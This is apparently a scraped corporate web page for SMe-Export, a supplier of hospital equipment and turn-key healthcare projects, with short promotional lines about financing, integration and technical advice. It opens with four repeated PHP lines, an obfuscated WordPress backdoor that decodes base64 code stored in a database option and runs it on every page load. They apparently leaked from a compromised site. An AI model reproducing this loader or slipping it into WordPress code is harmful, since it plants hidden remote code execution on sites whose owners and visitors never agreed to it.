add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );
add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );
add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );
add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ), 0 );
SMe-Export | SMe Export - Working for your success
Latest technologies
Optimization of resources
Financial solutions
Integral solutions
Value for money
Technical advice
Project integration
Turn-key projects
Final budgets
Hospital Management
SMe brings an extra to its customers, seeking for the financial solution needed for the project and adapted to the characteristics of each country and customer.
SMe provides a comprehensive solution for either complete projects or any phase of its phases.
The experience of its professionals gives SMe a wide knowledge of the sector to effectively choose the most relevant international manufacturers.
The constant evolution of hospital systems and their adaptation to new technologies requires continuous innovation of our structures and resources.